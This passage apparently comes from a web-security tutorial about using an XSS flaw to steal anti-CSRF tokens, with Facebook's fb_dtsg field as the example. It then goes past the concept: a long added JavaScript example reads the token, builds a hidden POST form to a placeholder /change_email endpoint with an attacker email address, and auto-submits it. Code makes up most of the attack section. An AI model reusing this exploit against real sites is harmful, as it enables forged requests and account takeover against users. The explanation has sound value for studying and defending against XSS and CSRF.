Using XSS to steal anti-CSRF tokens
If the web application has an XSS vulnerability, then a script we inject runs in the application's own origin and can read the page's DOM, including the hidden input that carries the anti-CSRF token. We can therefore steal the token with a little JavaScript and use it to build a CSRF exploit (a self-submitting form and so on), which is why an XSS flaw undermines token-based CSRF protection.
In the following image I've simulated an XSS vulnerability in Facebook through the Developer Console of Chrome and inserted the following code, which grabs the CSRF token from the hidden input named fb_dtsg and displays it in the browser, as shown in the screenshot following the code:

// Grab the anti-CSRF token from the hidden input named fb_dtsg
// (an HTMLCollection can be indexed by an element's name or id, so ['fb_dtsg'] works)
var csrf = document.getElementsByTagName("input")['fb_dtsg'].value;
// Display it; a real payload would exfiltrate it or feed it into a forged request instead
alert('Your CSRF protection token fb_dtsg has value ' + csrf);

Let's take a look at the following screenshot:
It seems plain and simple, right? Similarly, we can take the csrf variable from the JS code, inject it into a self-submitting form through DOM manipulation, and then make the form submit itself. I will leave this as an exercise.
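As an added example (not code from the original post), the following JavaScript carries the exercise through: it reads the anti-CSRF token from the hidden input, builds a POST form in the DOM that carries both the token and the attacker-chosen fields, and submits it. The token name fb_dtsg is the one from the screenshot above; the target endpoint /change_email, the email field and the token value are hypothetical placeholders chosen for illustration. The functions take the document as a parameter so that, in a browser, you pass the real `document`; the tiny fake document at the bottom is constructed here only so the code can be run offline.

```javascript
// Step 1: read the token from the hidden input with the given name.
// getElementsByName returns every element carrying that name; the first is the token field.
function stealToken(doc, tokenName) {
  const candidates = doc.getElementsByName(tokenName);
  return candidates.length > 0 ? candidates[0].value : null;
}

// Step 2: build a form that POSTs `fields` to `action` and attach it to the page.
// Every field, including the stolen token, becomes a hidden input so the request
// looks exactly like a legitimate form submission to the server.
function buildCsrfForm(doc, action, fields) {
  const form = doc.createElement("form");
  form.method = "POST";
  form.action = action;
  for (const [name, value] of Object.entries(fields)) {
    const input = doc.createElement("input");
    input.type = "hidden";
    input.name = name;
    input.value = value;
    form.appendChild(input);
  }
  doc.body.appendChild(form);
  return form;
}

// Step 3: combine the two. Returns the submitted form, or null when no token was found
// (for example when the injection ran on a page without the protected form).
function exploit(doc, tokenName, action, fields) {
  const token = stealToken(doc, tokenName);
  if (token === null) {
    return null;
  }
  const form = buildCsrfForm(doc, action, { ...fields, [tokenName]: token });
  form.submit(); // HTMLFormElement.submit() bypasses submit event handlers and validation
  return form;
}

// Constructed stand-in for the browser document, used only to exercise the code offline.
// It implements just the DOM methods the exploit uses.
function fakeDocument(existingInputs) {
  const submitted = [];
  const body = {
    children: [],
    appendChild(el) { this.children.push(el); return el; },
  };
  return {
    body,
    submitted,
    getElementsByName(name) {
      return existingInputs.filter((el) => el.name === name);
    },
    createElement(tag) {
      return {
        tagName: tag.toUpperCase(),
        children: [],
        appendChild(child) { this.children.push(child); return child; },
        submit() { submitted.push(this); },
      };
    },
  };
}

// Constructed sample page: a hidden input holding a placeholder token value.
const samplePage = fakeDocument([
  { tagName: "INPUT", type: "hidden", name: "fb_dtsg", value: "CONSTRUCTED_TOKEN_123" },
]);

// In a real browser the call would be:
//   exploit(document, "fb_dtsg", "/change_email", { email: "attacker@example.com" });
// where /change_email and the email field are hypothetical.
const submittedForm = exploit(samplePage, "fb_dtsg", "/change_email", {
  email: "attacker@example.com",
});
```

The form approach mirrors what the post describes, but note that once a script is already running in the application's origin it can also read the token and send the forged request directly with XMLHttpRequest or fetch; the separate form is mainly useful when the payload must be handed to a page the attacker controls.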